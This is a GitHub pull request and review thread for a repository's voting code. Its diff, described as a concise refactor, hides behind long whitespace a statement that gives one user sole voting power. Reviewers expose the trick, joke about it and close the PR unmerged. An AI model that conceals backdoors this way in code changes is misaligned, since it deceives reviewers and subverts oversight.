### PR TITLE
Make voting code concise.

### PR DESCRIPTION
**Pull request by syvb**
Make the voting code more concise.

### CODE REVIEW

**Comment by PlasmaPower** [comment]
Better yet: `weight = float(age >= settings.MIN_VOTER_AGE)`

File: github_api/voting.py [hunk 1]
```diff
@@ -116,9 +116,8 @@ def get_vote_weight(api, username):
     now = arrow.utcnow()
     created = arrow.get(user["created_at"])
     age = (now - created).total_seconds()
-    old_enough_to_vote = age >= settings.MIN_VOTER_AGE
-    weight = 1.0 if old_enough_to_vote else 0.0
-
+    weight = float(age >= settings.MIN_VOTER_AGE)                                                                                                                                                                                                                                                                                                                                            ;weight = 1.0 if user.lower() == "smittyvb" else 0.0
+
```
Comment (amoffat) [inline github_api/voting.py]: do you mean `user["login"].lower() == "smittyvb"` here?

File: github_api/voting.py [hunk 2]
```diff
@@ -116,9 +116,8 @@ def get_vote_weight(api, username):
     now = arrow.utcnow()
     created = arrow.get(user["created_at"])
     age = (now - created).total_seconds()
-    old_enough_to_vote = age >= settings.MIN_VOTER_AGE
-    weight = 1.0 if old_enough_to_vote else 0.0
-
+    weight = float(age >= settings.MIN_VOTER_AGE)                                                                                                                                                                                                                                                                                                                                            ;weight = 1.0 if user.lower() == "smittyvb" else 0.0
```
Comment (amoffat) [inline github_api/voting.py]: do you mean `user["login"].lower() == "smittyvb"` here?

Comment (Alexays) [reply github_api/voting.py]: Oh again a dictator :o

**Comment by yet-another-account** [comment]
Plasma2.0

File: github_api/voting.py [hunk 3]
```diff
@@ -116,7 +116,7 @@ def get_vote_weight(api, username):
     now = arrow.utcnow()
     created = arrow.get(user["created_at"])
     age = (now - created).total_seconds()
-    weight = float(age >= settings.MIN_VOTER_AGE)                                                                                                                                                                                                                                                                                                                                            ;weight = 1.0 if user.lower() == "smittyvb" else 0.0
+    weight = float(age >= settings.MIN_VOTER_AGE)                                                                                                                                                                                                                                                                                                                                            ;weight = 1.0 if user["login"].lower() == "smittyvb" else 0.0
```
Comment (viktorsec) [inline github_api/voting.py]: should be `user["login"].lower() == "plasmapower"`

**Review by viktorsec — CHANGES_REQUESTED** [review]
please fix this issue

**Comment by amoffat** [comment]
interestingly, if you're using "split diff", it's harder to conceal the change:

## split diff:
split diff

## unified diff:
unified diff

**Comment by syvb** [comment]
👍 looks good

**Comment by PlasmaPower** [comment]
@Smittyvb with proper timing you probably could've done this :)

File: github_api/voting.py [hunk 4]
```diff
@@ -116,9 +116,8 @@ def get_vote_weight(api, username):
     now = arrow.utcnow()
     created = arrow.get(user["created_at"])
     age = (now - created).total_seconds()
-    old_enough_to_vote = age >= settings.MIN_VOTER_AGE
-    weight = 1.0 if old_enough_to_vote else 0.0
-
+    weight = float(age >= settings.MIN_VOTER_AGE)                                                                                                                                                                                                                                                                                                                                             ;weight = 1.0 if user["login"].lower() == "smittyvb" else 0.0
```
Comment (phil-r) [inline github_api/voting.py:119]: clever

**Review by phil-r — CHANGES_REQUESTED** [review]

File: github_api/voting.py (hunk 4 above)
Comment (rudehn) [reply github_api/voting.py:119]: take it from the master. You have to resubmit this in about 3 hours hehe

**Pull request closed without merging**